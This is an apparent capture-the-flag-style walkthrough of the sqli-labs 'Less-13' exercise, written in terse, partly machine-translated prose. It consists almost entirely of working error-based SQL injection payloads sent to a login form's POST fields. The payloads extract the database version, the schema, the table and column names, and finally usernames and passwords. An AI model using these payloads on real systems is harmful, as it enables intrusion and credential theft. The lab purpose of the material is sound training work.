Less-13 POST -Double Injection -Single quotes -String - with twist
0x01
You
have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '1') LIMIT
0,1' at line 1
The error statement may be used ') is closed
= the uname ') or #. 1. 1 =
0x02. Get database version
uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
0x03. Gets the database name
uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
0x04. Gets the table name
uname=’) union select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=’security’ limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
You can obtain additional table name by changing the value of the limit
uname=’) union select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=’security’ limit 3,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
0x05. Gets the field name
uname=') union select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema='security'and table_name='users'limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
uname=') union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
0x06. Gets the number of fields
uname=') union select count(*),concat((select concat(count(*),0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
0x07. Gets the field value
uname=') union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
Specific meaning and understanding query can view the Less-5